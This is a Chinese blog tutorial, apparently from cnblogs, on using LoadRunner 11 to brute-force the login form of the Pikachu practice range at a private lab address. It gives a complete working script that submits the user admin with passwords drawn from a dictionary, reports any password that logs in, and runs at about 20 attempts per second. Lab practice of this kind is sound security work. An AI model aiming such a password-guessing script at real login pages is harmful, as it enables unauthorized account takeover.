首页 > 其他分享 >使用loadrunner11开展爆破测试

使用loadrunner11开展爆破测试

时间:2023-06-18 23:12:36浏览次数:49  
标签:web 爆破 Value lr 192.168 测试 loadrunner11 LR 0.108

备注:阅读本文需要一定的loadrunner11操作基础和代码编写基础,请各位预知。

 

本次爆破目标为pikachu靶场,访问地址:http://192.168.0.108/pikachu/

我们本次测试默认的弱口令admin 123456

 

1)使用函数声明变量msg,其中LB和RB是通过页面解析出来的左右边界,如果访问成功,LB和RB之间的结果是login success

    Search=Body代表只搜索http响应体而不搜索响应头

web_reg_save_param("msg",  
        "LB=<span class=\"bigger-110\">Login</span>-->",  
        "RB=</div><!-- /.widget-main -->",   
        "Search=Body",  
        LAST);

 2)web_submit_data中的Value={pwd}为字典值,选中原有的密码点击右键

	web_submit_data("bf_form.php", 
		"Action=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php", 
		"Method=POST", 
		"RecContentType=text/html", 
		"Referer=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php", 
		"Snapshot=t19.inf", 
		"Mode=HTTP", 
		ITEMDATA, 
		"Name=username", "Value=admin", ENDITEM, 
		"Name=password", "Value={pwd}", ENDITEM, 
		"Name=submit", "Value=Login", ENDITEM, 
		LAST);

之后如下设置,Unique搭配Once代表每个虚拟用户只能取一次值,执行一次代码就退出

3)如果不包含登陆成功一律成功结束,否则在异常日志中打出密码,因为lr11在压测时默认不打正常日志,只关注异常日志

	if(strstr(lr_eval_string("{msg}"),"login success") != NULL ){
		lr_error_message("password is %s", lr_eval_string("{pwd}"));
		lr_exit(LR_EXIT_VUSER,LR_PASS);
	}else{
		lr_exit(LR_EXIT_VUSER,LR_PASS);
	}

 4)完整代码

Action()
{
	web_add_cookie("PHPSESSID=atpe10b8oegop9p8l0h6ag5lua; DOMAIN=192.168.0.108");
	web_reg_save_param("msg",  
        "LB=<span class=\"bigger-110\">Login</span>-->",  
        "RB=</div><!-- /.widget-main -->",   
        "Search=Body",  
        LAST);  
	web_submit_data("bf_form.php", 
		"Action=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php", 
		"Method=POST", 
		"RecContentType=text/html", 
		"Referer=http://192.168.0.108/pikachu/vul/burteforce/bf_form.php", 
		"Snapshot=t19.inf", 
		"Mode=HTTP", 
		ITEMDATA, 
		"Name=username", "Value=admin", ENDITEM, 
		"Name=password", "Value={pwd}", ENDITEM, 
		"Name=submit", "Value=Login", ENDITEM, 
		LAST);
	//lr_output_message(lr_eval_string("{msg}"));
	if(strstr(lr_eval_string("{msg}"),"login success") != NULL ){
		lr_error_message("password is %s", lr_eval_string("{pwd}"));
		lr_exit(LR_EXIT_VUSER,LR_PASS);
	}else{
		lr_exit(LR_EXIT_VUSER,LR_PASS);
	}
	return 0;
}

5)可以默认启动n多用户,而并发就自己控制,下图这样设置就代表1秒20个并发

 

6)最终结果,在右侧Errors中出现红色值就说明我们的异常日志打出来了,间接代表有密码猜解到了

标签:web,爆破,Value,lr,192.168,测试,loadrunner11,LR,0.108
From: https://www.cnblogs.com/k4n5ha0/p/17489966.html

相关文章

  • 软件测试|web自动化测试神器playwright教程(二十七)
    前言使用selenium进行web自动化测试,如果我们打开了多个网页,进行网页切换时,我们需要先获取各个页面的句柄,通过句柄来区分各个页面,然后使用switch_to.window()实现切换,这样的操作比较麻烦,playwright的网页切换比selenium更为简单快捷。本文就给大家介绍一下playwright多个网页的切换......
  • 软件测试|web自动化测试神器playwright教程(二十三)
    前言我们在进行web自动化时,经常遇到一些不好操作的元素,普通的元素定位和操作容易报错,如果我们使用的selenium的话,就可以使用selenium调用js脚本进行操作。在playwright中也有类似的方法,使用page.evaluate()执行JavaScript脚本。page.evaluate()和page.evaluate_handle()之间的唯......
  • 软件测试|web自动化测试神器playwright教程(二十五)
    前言鼠标为我们使用电脑提供了很多方便,我们看到的东西就可以将鼠标移动过去进行点击就可以打开或者访问内容,当页面内容过长时,我们也可以使用鼠标滚轮来实现对整个页面内容的查看,其实playwright也有鼠标操作的方法,本文我们就来介绍playwright的鼠标操作。鼠标操作Mouse鼠标操作是基......
  • 多线程开启gprof性能测试的简易方法
    用到gprof时才知道,原来gprof只能对主线程统计耗时。manual上也没写线程相关的问题啊?不过有现成的解决方案:http://sam.zoy.org/writings/programming/gprof.html该方案封装了pthread_create(),让线程初始化执行一个setitimer(ITIMER_PROF,...)。简易的方法是直接在代码中写个setit......
  • IT软件测试中各种环境【杭州多测师_王sir】
    软件开发环境(Software Development Environment,SDE)是指在基本硬件和宿主软件的基础上,为支持系统软件和应用软件的工程化开发和维护而使用的一组软件,简称SDE。它由软件工具和环境集成机制构成,前者用以支持软件开发的相关过程、活动和任务,后者为工具集成和软件的开发、维护及管......
  • 接口测试-编写接口测试用例【杭州多测师_王sir】
      ......
  • 性能测试-到底怎么做性能测试?【杭州多测师_王sir】
    一、前期准备性能测试虽然是核心功能稳定后才开始压测,但是在需求阶段就应该参与,这样可以深入了解系统业务、重要功能的业务逻辑,为后续做准备。二、性能需求分析(评审)评审时,要明确性能测试范围、目标;由于非专业性能测试人员不知道怎么定目标,如果你让他们定,可能定的目标会很离谱,比如,......
  • 性能测试-编写性能测试用例模板【杭州多测师_王sir】
    一、预期指标性能测试二、并发用户测试三、容量测试四、稳定性测试五、大数据量测试六、网络性能测试 ......
  • 单元测试-在弹簧测试上禁用@EnableScheduling
    当我运行单元测试时,它会调用我的计划任务。我想防止这种行为,这是由于我的主应用程序配置中包含@EnableScheduling而引起的。如何在单元测试中禁用此功能?我遇到了这个建议设置个人资料的问题/答案。不知道我该怎么做?还是过度杀伤力?我当时在考虑为我的单元测试使用一个单独的Ap......
  • 备库归档日志文件的删除测试
    文档课题:备库归档日志文件的删除测试.数据库:oracle11.2.0.4架构:rac(2节点)+dg(orcldg与sh_orcl)场景描述:在该架构中,orcldg备库作为sh_orcl备库归档日志文件的来源,现测试以下两点:a、归档日志文件从orcldg备库传输到sh_orcl备库后先不应用,此时orcldg端是否能删除未应......